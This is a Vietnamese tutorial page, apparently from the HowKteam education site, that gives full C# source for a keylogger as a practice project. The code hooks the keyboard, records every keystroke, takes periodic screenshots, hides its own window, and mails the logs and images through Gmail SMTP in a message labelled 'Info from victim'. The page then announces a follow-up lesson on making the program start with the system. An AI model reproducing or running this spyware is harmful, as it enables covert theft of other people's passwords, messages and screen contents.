Lập trình Keylogger với C# Application

Lập trình Keylogger với C# Application

Gửi email thông tin tool Keylogger với C# Console Application Gửi email thông tin tool Keylogger với C# Console Application Gửi email thông tin tool Keylogger với C# Console Application Gửi email thông tin tool Keylogger với C# Console Application Gửi email thông tin tool Keylogger với C# Console Application 0/5 (12 reviews)

Gửi email thông tin tool Keylogger với C# Console Application

Đã đăng 2016-12-14 03:27:04 bởi HowKteam
0 bình luận 3568 lượt xem
Gửi email thông tin tool Keylogger với C# Console Application 0 /5 stars (0 reviews)
 

Không có gì tuyệt vời hơn là luyện tập với ví dụ thực tế. Nào cùng nhau thử thách bản thân với tool: Keylogger

Bạn nên có kiến thức về:

 • Console application
 • Threading
 • Bitmap
 • Vòng lặp
 • Xử lý chuỗi
 • Nhiều thứ linh tinh khác

Code Program.cs

using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Net.Mail;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace KeyLogger
{
  class Program
  {
    #region hook key board
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

    private static LowLevelKeyboardProc _proc = HookCallback;
    private static IntPtr _hookID = IntPtr.Zero; 

    private static string logName = "Log_";
    private static string logExtendtion = ".txt";

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr SetWindowsHookEx(int idHook,
      LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
      IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    /// <summary>
    /// Delegate a LowLevelKeyboardProc to use user32.dll
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private delegate IntPtr LowLevelKeyboardProc(
    int nCode, IntPtr wParam, IntPtr lParam);

    /// <summary>
    /// Set hook into all current process
    /// </summary>
    /// <param name="proc"></param>
    /// <returns></returns>
    private static IntPtr SetHook(LowLevelKeyboardProc proc)
    {
      using (Process curProcess = Process.GetCurrentProcess())
      {
        using (ProcessModule curModule = curProcess.MainModule)
        {
          return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
          GetModuleHandle(curModule.ModuleName), 0);
        }
      }
    }

    /// <summary>
    /// Every time the OS call back pressed key. Catch them 
    /// then cal the CallNextHookEx to wait for the next key
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
    {
      if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
      {
        int vkCode = Marshal.ReadInt32(lParam);

        CheckHotKey(vkCode);
        WriteLog(vkCode);
      }
      return CallNextHookEx(_hookID, nCode, wParam, lParam);
    }

    /// <summary>
    /// Write pressed key into log.txt file
    /// </summary>
    /// <param name="vkCode"></param>
    static void WriteLog(int vkCode)
    {
      Console.WriteLine((Keys)vkCode);
      string logNameToWrite = logName + DateTime.Now.ToLongDateString() + logExtendtion;
      StreamWriter sw = new StreamWriter(logNameToWrite, true);
      sw.Write((Keys)vkCode);
      sw.Close();
    }
    
    /// <summary>
    /// Start hook key board and hide the key logger
    /// Key logger only show again if pressed right Hot key
    /// </summary>
    static void HookKeyboard()
    {
      _hookID = SetHook(_proc);
      Application.Run();
      UnhookWindowsHookEx(_hookID);
    }

    static bool isHotKey = false;
    static bool isShowing = false;
    static Keys previoursKey = Keys.Separator;
    
    static void CheckHotKey(int vkCode)
    {
      if ((previoursKey == Keys.LControlKey || previoursKey == Keys.RControlKey) && (Keys)(vkCode) == Keys.K)
        isHotKey = true;

      if (isHotKey)
      {
        if (!isShowing)
        {
          DisplayWindow();          
        }
        else
          HideWindow();

        isShowing = !isShowing;
      }

      previoursKey = (Keys)vkCode;
      isHotKey = false;
    }
    #endregion   

    #region Capture
    static string imagePath = "Image_";
    static string imageExtendtion = ".png";

    static int imageCount = 0;
    static int captureTime = 100;

    /// <summary>
    /// Capture al screen then save into ImagePath
    /// </summary>
    static void CaptureScreen()
    {
      //Create a new bitmap.
      var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width,
                      Screen.PrimaryScreen.Bounds.Height,
                      PixelFormat.Format32bppArgb);

      // Create a graphics object from the bitmap.
      var gfxScreenshot = Graphics.FromImage(bmpScreenshot);

      // Take the screenshot from the upper left corner to the right bottom corner.
      gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X,
                    Screen.PrimaryScreen.Bounds.Y,
                    0,
                    0,
                    Screen.PrimaryScreen.Bounds.Size,
                    CopyPixelOperation.SourceCopy);

      string directoryImage = imagePath + DateTime.Now.ToLongDateString();

      if (!Directory.Exists(directoryImage))
      {
        Directory.CreateDirectory(directoryImage);
      }
      // Save the screenshot to the specified path that the user has chosen.
      string imageName = string.Format("{0}\\{1}{2}", directoryImage, DateTime.Now.ToLongDateString() + imageCount, imageExtendtion);

      try
      {
        bmpScreenshot.Save(imageName, ImageFormat.Png);
      }
      catch
      {

      }
      imageCount++;
    }

    #endregion

    #region Timer
    static int interval = 1;
    static void StartTimmer()
    {
      Thread thread = new Thread(() => {
        while (true)
        {
          Thread.Sleep(1);

          if (interval % captureTime == 0)
            CaptureScreen();

          if (interval % mailTime == 0)
            SendMail();

          interval++;

          if (interval >= 1000000)
            interval = 0;
        }
      });
      thread.IsBackground = true;
      thread.Start();
    }
    #endregion

    #region Windows
    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    // hide window code
    const int SW_HIDE = 0;

    // show window code
    const int SW_SHOW = 5;

    static void HideWindow()
    {
      IntPtr console = GetConsoleWindow();
      ShowWindow(console, SW_HIDE);
    }

    static void DisplayWindow()
    {
      IntPtr console = GetConsoleWindow();
      ShowWindow(console, SW_SHOW);
    }
    #endregion    

    #region Mail
    static int mailTime = 5000;
    static void SendMail()
    {
      try
      {
        MailMessage mail = new MailMessage();
        SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");

        mail.From = new MailAddress("email@gmail.com");
        mail.To.Add("email@gmail.com");
        mail.Subject = "Keylogger date: " + DateTime.Now.ToLongDateString();
        mail.Body = "Info from victim\n";

        string logFile = logName + DateTime.Now.ToLongDateString() + logExtendtion;

        if (File.Exists(logFile))
        {
          StreamReader sr = new StreamReader(logFile);

          mail.Body += sr.ReadToEnd();

          sr.Close();
        }

        string directoryImage = imagePath + DateTime.Now.ToLongDateString();
        DirectoryInfo image = new DirectoryInfo(directoryImage);

        foreach (FileInfo item in image.GetFiles("*.png"))
        {
          if (File.Exists(directoryImage + "\\" + item.Name))
            mail.Attachments.Add(new Attachment(directoryImage + "\\" + item.Name));
        }

        SmtpServer.Port = 587;
        SmtpServer.Credentials = new System.Net.NetworkCredential("email@gmail.com", "password");
        SmtpServer.EnableSsl = true;

        SmtpServer.Send(mail);
        Console.WriteLine("Send mail!");

        // phải làm cái này ở mail dùng để gửi phải bật lên
        // https://www.google.com/settings/u/1/security/lesssecureapps
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.ToString());
      }
    }
    #endregion
    static void Main(string[] args)
    {
      HideWindow();

      StartTimmer();
      HookKeyboard();
    }
  }
}

Bài sau chúng ta sẽ cùng nhau tìm hiểu cách khởi động cùng hệ thống.

Đừng quên: “Luyện tập – Thử thách – Không ngại khó

Chia sẻ:
Thảo luận Hỏi và đáp Báo lỗi bài viết
Hủy bỏ   hoặc  
Hủy bỏ   hoặc  
Hủy bỏ   hoặc  

Chiến dịch

Kteam - Howkteam Free Education